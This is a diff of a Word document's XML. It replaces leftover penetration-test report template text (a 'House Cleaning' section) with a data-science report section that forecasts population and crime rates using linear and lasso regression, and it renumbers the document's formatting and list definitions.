+        <w:t>Linear Regression performed the best. It perfectly fit the training data and performed well on unseen data. Lasso Regression and Random Forest Regressor also achieved good results, but they were slightly less accurate than Linear Regression.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>After Understanding PCA e Linear Regression</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and Lasso Regression</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and Random Forest Regressor, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>we will now use only the principal features of our datasets to predict population growth and crime rates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">First, we will predict </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">population growth for the next </w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> years</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> using simple linear regression, t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hen, we will use this result as an input to a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lasso</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> regression model to predict crime rates for the next 8 years. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:b/>
           <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc59959357"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.5 </w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Predicting Population growth:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>For this purpose, I’ve created a new</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> model,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
+        <w:t>lr_pop</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– House Cleaning</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that utilize simple regression, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>since</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> we have only the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Y</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ear and Population</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>After, I’ve created a new</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with a range of years from 2023 to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>2030, and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>applied</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the model </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lr_pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” to predict the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>population.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E06042" wp14:editId="1248EC29">
+            <wp:extent cx="2179921" cy="1981746"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2138304351" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2138304351" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2195519" cy="1995926"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Subsequently, I employed the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>outcome in a new</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> model, "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lasso</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_crime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>," which estimates crime rates based on population demographics.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="728A13C2" wp14:editId="4125F1AF">
+            <wp:extent cx="1959076" cy="1772141"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="1318433565" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1318433565" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId44"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1973277" cy="1784987"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Result</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">As a result, using linear regression and lasso regression, we could predict </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">well </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">that crime rates would decline over the next seven years. This is a positive trend, and it suggests that the model </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>is able to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> identify factors that are contributing to the current crime rate and that these factors are likely to change in the future.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14921,7 +15575,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc59959358"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc59959358"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -14935,7 +15589,7 @@
         </w:rPr>
         <w:t xml:space="preserve">4.0 </w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="6"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -14964,8 +15618,9 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="36B38C43">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="789EA1F9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -14988,7 +15643,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43" cstate="print">
+                    <a:blip r:embed="rId45" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15019,7 +15674,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId44"/>
+      <w:footerReference w:type="default" r:id="rId46"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -15809,6 +16464,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="172F21E9"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="33A0D75E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1840746E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D118468A"/>
@@ -15957,7 +16761,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="21AE570E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D68C38DE"/>
@@ -16106,7 +16910,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2ED015B1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D18CA3C4"/>
@@ -16255,7 +17059,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36714E74"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="187EFDD0"/>
@@ -16404,7 +17208,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3CC628F4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CDCED664"/>
@@ -16525,7 +17329,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42D222BE"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2796FD26"/>
@@ -16674,7 +17478,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="476E1581"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="76C603AC"/>
@@ -16796,7 +17600,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFE6204"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="08A06254"/>
@@ -16945,7 +17749,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="517C4A0B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9B22E250"/>
@@ -17094,7 +17898,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5344241A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
@@ -17415,7 +18219,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="536E5AC0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="8CDAEE96"/>
@@ -17564,7 +18368,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="59E86317"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="468E0D0E"/>
@@ -17677,7 +18481,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B273C87"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2AA8E13E"/>
@@ -17790,7 +18594,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="606707C5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9E56C806"/>
@@ -17939,13 +18743,13 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="648F1753"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
     <w:numStyleLink w:val="ImportedStyle1"/>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65716509"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AE00DACA"/>
@@ -18094,7 +18898,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="674C097A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9F9468A6"/>
@@ -18243,7 +19047,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="725D2623"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="87A8D2E8"/>
@@ -18392,7 +19196,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A83416C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0AAA7DC0"/>
@@ -18542,34 +19346,34 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1760440869">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="305356629">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1166743486">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1173181685">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1246454614">
